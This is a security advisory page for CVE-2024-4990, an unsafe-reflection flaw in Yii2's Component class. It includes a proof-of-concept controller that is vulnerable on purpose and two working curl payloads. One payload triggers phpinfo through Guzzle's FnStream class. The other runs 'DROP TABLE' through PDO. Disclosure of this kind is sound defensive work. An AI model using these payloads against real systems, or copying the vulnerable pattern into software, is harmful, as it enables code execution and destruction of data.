ghsa-cjcc-p67m-7qxm
Vulnerability from github
Published
2024-06-02 22:30
Modified
2025-04-01 23:13
Severity ?
8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
Unsafe Reflection in base Component class in yiisoft/yii2
Details

Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.

Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.

Impact

With some effort malicious code can be injected executed which might be anything ranging from deleting files to dropping database tables

Patches

Not yet patched.

Workarounds

No Work around available

References

Reported Here

in case the link is dead, here is the full description

Description

Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.

Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.

Depending on the installed dependencies various kind of attacks are possible.

Proof of Concept

A PoC application was created using composer create-project, as specified in the getting started.

Yii JSON parser was enabled in the configuration:

```php 'parsers' => [ 'application/json' => 'yii\web\JsonParser' ]

```

A vulnerable controller was added:

```php <?php

namespace app\controllers;

use yii\base\Component; use yii\web\Controller;

class ExploitableController extends Controller { public function beforeAction($action): bool { // Needed only to simplify the PoC $this->enableCsrfValidation = false; return parent::beforeAction($action); }

public function actionVulnerable(): string
{
    $fields = $this->request->post();
    $myComponent = new Component();
    foreach ($fields as $key => $value) {
        $myComponent->$key = $value;
    }
    return "";
}

}

```

Executing phpinfo()

Following command stores the content of phpinfo() inside info.html:

```bash curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"GuzzleHttp\Psr7\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable > info.html

```

It leverages the fact that GuzzleHttp\Psr7\FnStream class executes call_user_func($this->_fn_close) inside __destruct(). This class is a default dependency.

Executing arbitrary MySQL queries (blind execution)

If the application is connected to a MySQL database it is possible to exploit the PDO class to execute arbitrary SQL queries:

```bash curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"\PDO", "__construct()": ["mysql:host=127.0.0.1;dbname=test", "test", "test", {"1002": "DROP TABLE test"}]}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable

```

Notice that the server will always return a 500 Internal Server Error (because the instantiated class is not a Behavior), however the query is executed, even if we can't receive any output from it. If the query fails we might see a PDO error message (i.e. "Table 'test.foo' doesn't exist"), depending on the app configuration.

Impact

It is not trivial to exploit this bug, because it depends on peculiar characteristics of the target application. However, it looks that there is at least one very popular product built on Yii2 that is severely affected by this vulnerability (allowing to an anonymous user to gain admin access, with an easy exploit).

The consequences of the exploitation could vary from retrieving sensitive information to DoS or unauthorized access.

Occurrences

Component.php L191

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "yiisoft/yii2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.49.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-4990"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-02T22:30:39Z",
    "nvd_published_at": "2025-03-20T10:15:32Z",
    "severity": "HIGH"
  },
  "details": "Yii2 supports attaching Behaviors to Components by setting properties having the format `\u0027as \u003cbehaviour-name\u003e\u0027`.\n\nInternally this is done using the `__set()` magic method. If the value passed to this method is not an instance of the `Behavior` class, a new object is instantiated using `Yii::createObject($value)`. However, there is no validation check that verifies that `$value` is a valid `Behavior` class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.\n\n### Impact\nWith some effort malicious code can be injected executed which might be anything ranging from deleting files to dropping database tables\n\n### Patches\nNot yet patched.\n\n### Workarounds\nNo Work around available\n\n### References\nReported [Here](https://huntr.com/bounties/4fbdd965-02b6-42e4-b57b-f98f93415b8f?token=3bcfc5266870680af19a26170b8dbf3750e3b593ce192da8eaa6a03f96b99b52c419e15768c56f23991dc50003aa1a9e3cb3f1f9321e18bd506d68a9f937cd5b7ca90fb47967df22c8768c0c48f7206f36b583464af7e44bf93eecc5398a2764b98e02cf8e280397785106db16e4197951554eb9b9c46649f4339e2f413cf6a0197ab2e0) \n\nin case the link is dead, here is the full description\n\n# Description\n\nYii2 supports attaching Behaviors to Components by setting properties having the format  `\u0027as \u003cbehaviour-name\u003e\u0027`.\n\nInternally this is done using the  `__set()`  magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using  `Yii::createObject($value)`. However, there is no validation check that verifies that  `$value`  is a valid Behavior class name or configuration. An attacker that can control the content of the  `$value`  variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.\n\nDepending on the installed dependencies various kind of attacks are possible.\n\n# Proof of Concept\n\nA PoC application was created using  `composer create-project`, as specified in the  [getting started](https://www.yiiframework.com/doc/guide/2.0/en/start-installation).\n\nYii JSON parser was enabled in the configuration:\n\n```php\n\u0027parsers\u0027 =\u003e [ \u0027application/json\u0027 =\u003e \u0027yii\\web\\JsonParser\u0027 ]\n\n```\n\nA vulnerable controller was added:\n\n```php\n\u003c?php\n\nnamespace app\\controllers;\n\nuse yii\\base\\Component;\nuse yii\\web\\Controller;\n\nclass ExploitableController extends Controller\n{\n    public function beforeAction($action): bool\n    {\n        // Needed only to simplify the PoC\n        $this-\u003eenableCsrfValidation = false;\n        return parent::beforeAction($action);\n    }\n\n    public function actionVulnerable(): string\n    {\n        $fields = $this-\u003erequest-\u003epost();\n        $myComponent = new Component();\n        foreach ($fields as $key =\u003e $value) {\n            $myComponent-\u003e$key = $value;\n        }\n        return \"\";\n    }\n}\n\n```\n\n## Executing phpinfo()\n\nFollowing command stores the content of  `phpinfo()`  inside info.html:\n\n```bash\ncurl -XPOST -H \"Content-Type: application/json\" -d \u0027{\"as hack\": {\"__class\":\"GuzzleHttp\\\\Psr7\\\\FnStream\", \"__construct()\": [[]], \"_fn_close\": \"phpinfo\"}}\u0027 http://localhost:8080/index.php?r=exploitable%2Fvulnerable \u003e info.html\n\n```\n\nIt leverages the fact that  `GuzzleHttp\\Psr7\\FnStream`  class executes  `call_user_func($this-\u003e_fn_close)`  inside  `__destruct()`. This class is a default dependency.\n\n## Executing arbitrary MySQL queries (blind execution)\n\nIf the application is connected to a MySQL database it is possible to exploit the  `PDO`  class to execute arbitrary SQL queries:\n\n```bash\ncurl -XPOST -H \"Content-Type: application/json\" -d \u0027{\"as hack\": {\"__class\":\"\\\\PDO\", \"__construct()\": [\"mysql:host=127.0.0.1;dbname=test\", \"test\", \"test\", {\"1002\": \"DROP TABLE test\"}]}}\u0027 http://localhost:8080/index.php?r=exploitable%2Fvulnerable\n\n```\n\nNotice that the server will always return a 500 Internal Server Error (because the instantiated class is not a Behavior), however the query is executed, even if we can\u0027t receive any output from it. If the query fails we might see a PDO error message (i.e. \"Table \u0027test.foo\u0027 doesn\u0027t exist\"), depending on the app configuration.\n\n# Impact\n\nIt is not trivial to exploit this bug, because it depends on peculiar characteristics of the target application. However, it looks that there is at least one very popular product built on Yii2 that is severely affected by this vulnerability (allowing to an anonymous user to gain admin access, with an easy exploit).\n\nThe consequences of the exploitation could vary from retrieving sensitive information to DoS or unauthorized access.\n\n# Occurrences\n\n[Component.php L191](https://github.com/yiisoft/yii2/blob/2.0.48/framework/base/Component.php#L191)",
  "id": "GHSA-cjcc-p67m-7qxm",
  "modified": "2025-04-01T23:13:58Z",
  "published": "2024-06-02T22:30:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/security/advisories/GHSA-cjcc-p67m-7qxm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4990"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/pull/20183"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/commit/628d406bfafb80fc32147837888c0057d89a021e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/commit/62d081f18c3602d09e7d075bba3a0ca5c313f0b4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2/CVE-2024-4990.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/yiisoft/yii2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/blob/master/framework/CHANGELOG.md#2050-may-30-2024"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/4fbdd965-02b6-42e4-b57b-f98f93415b8f"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Unsafe Reflection in base Component class in yiisoft/yii2"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.